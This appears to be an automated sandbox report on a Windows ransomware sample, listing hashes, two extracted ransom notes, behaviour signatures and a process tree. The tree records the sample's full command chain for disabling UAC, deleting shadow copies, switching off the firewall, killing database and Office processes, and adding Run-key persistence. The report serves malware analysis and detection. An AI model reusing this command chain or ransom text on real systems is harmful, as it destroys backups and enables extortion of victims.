Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01/04/2021, 09:52

General

  • Target

    rcru_64.exe

  • Size

    1.0MB

  • MD5

    0d5d7377432ee449f30626c2371a0080

  • SHA1

    56a1d1203d62c131b70837d75af79aa19a3b0487

  • SHA256

    94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9

  • SHA512

    19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Malware Config

Extracted

Path

\??\c:\Read_Me!_.txt

Ransom Note
Your Data Locked. To Get Decryption Instructions Email Us ,Don't Edit Files Or Folders ! ID : rfeHv0 Email Address :[email protected]

Extracted

Path

C:\Users\Admin\Desktop\ReadMe_Now!.hta

Ransom Note
All Your Files Have Been Encrypted ! All Your Files Encrypted Due To A Security Problem With Your PC. If You Need Your Files Please Send Us E-mail To Get Decryption Tools .The Only Way Of Recovering Files Is To Purchase For Decryption Tools ( Payment Must Be Made With Bitcoin ) . If You Do Not E-mail Us After 48 Hours Decryption Fee Will Double.Our E-mail Address : [email protected] Personal ID : rfeHv0Sent E-mail Should Be Contains Your Personal ID.If Don't Get a Response Or Any Other Problem Write Us E-mail At : [email protected] Check Your Spam Folder Too. What Guarantee Do We Give You ? You Can Send Some Files For Decryption Test( Before Paying ). File Size Must Be Less Than 2MB And Files Should Not Contains Valuabe Data Like (Backups , Databases etc ... ) . Get Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Other Websites By Searching At Google :http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention !! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files Forever. In Case Of Trying To Decrypt Files With Third-Party,Recovery Sofwares This May Make The Decryption Harder So Prices Will Be Rise.

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 19 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 40 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
    "C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:1976
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1972
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        PID:1764
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        PID:916
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
        3⤵
        PID:544
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im notepad.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1224
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msftesql.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlagent.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1784
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlbrowser.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlservr.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1352
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlwriter.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:976
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im oracle.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1764
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocssd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1812
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbsnmp.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:304
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im synctime.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1624
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2008
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopqos.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1896
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im isqlplussvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1612
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im xfssvccon.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1456
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopservice.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1056
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocautoupds.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:284
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:916
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im encsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1188
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im firefoxconfig.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1996
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im tbirdconfig.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1776
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocomm.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld.exe
        3⤵
        • Kills process with taskkill
        PID:1616
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-nt.exe
        3⤵
        • Kills process with taskkill
        PID:664
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-opt.exe
        3⤵
        • Kills process with taskkill
        PID:804
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbeng50.exe
        3⤵
        • Kills process with taskkill
        PID:468
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqbcoreservice.exe
        3⤵
        • Kills process with taskkill
        PID:668
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im excel.exe
        3⤵
        • Kills process with taskkill
        PID:1196
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im infopath.exe
        3⤵
        • Kills process with taskkill
        PID:1224
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msaccess.exe
        3⤵
        • Kills process with taskkill
        PID:1984
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mspub.exe
        3⤵
        • Kills process with taskkill
        PID:1784
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im onenote.exe
        3⤵
        • Kills process with taskkill
        PID:1692
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im outlook.exe
        3⤵
        • Kills process with taskkill
        PID:1772
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im powerpnt.exe
        3⤵
        • Kills process with taskkill
        PID:1380
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im steam.exe
        3⤵
        • Kills process with taskkill
        PID:284
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat.exe
        3⤵
        • Kills process with taskkill
        PID:916
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat64.exe
        3⤵
        • Kills process with taskkill
        PID:556
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thunderbird.exe
        3⤵
        • Kills process with taskkill
        PID:296
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im visio.exe
        3⤵
        • Kills process with taskkill
        PID:1304
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im winword.exe
        3⤵
        • Kills process with taskkill
        PID:1584
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im wordpad.exe
        3⤵
        • Kills process with taskkill
        PID:1456
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo %date%-%time%
      2⤵
      PID:1056
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      2⤵
      PID:1352
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
      2⤵
      PID:612
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup myip.opendns.com. resolver1.opendns.com
        3⤵
        PID:324
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
      2⤵
      PID:1460
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
        3⤵
        PID:1060
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
        3⤵
        • Modifies registry key
        PID:1188
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
      2⤵
      PID:1968
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:896
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
        3⤵
        • Adds Run key to start application
        PID:1104
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe_Now!.hta"
      2⤵
      • Modifies Internet Explorer settings
      PID:1204
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe_Now!.hta"
      2⤵
      • Modifies Internet Explorer settings
      PID:1724
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1316
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:960
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x1c0
    1⤵
    PID:1692
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Read_Me!_.txt
    1⤵
    PID:860

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/960-64-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

    Filesize

    8KB

  • memory/1152-2-0x00000000760C1000-0x00000000760C3000-memory.dmp

    Filesize

    8KB

  • memory/2032-67-0x000007FEF6010000-0x000007FEF628A000-memory.dmp

    Filesize

    2.5MB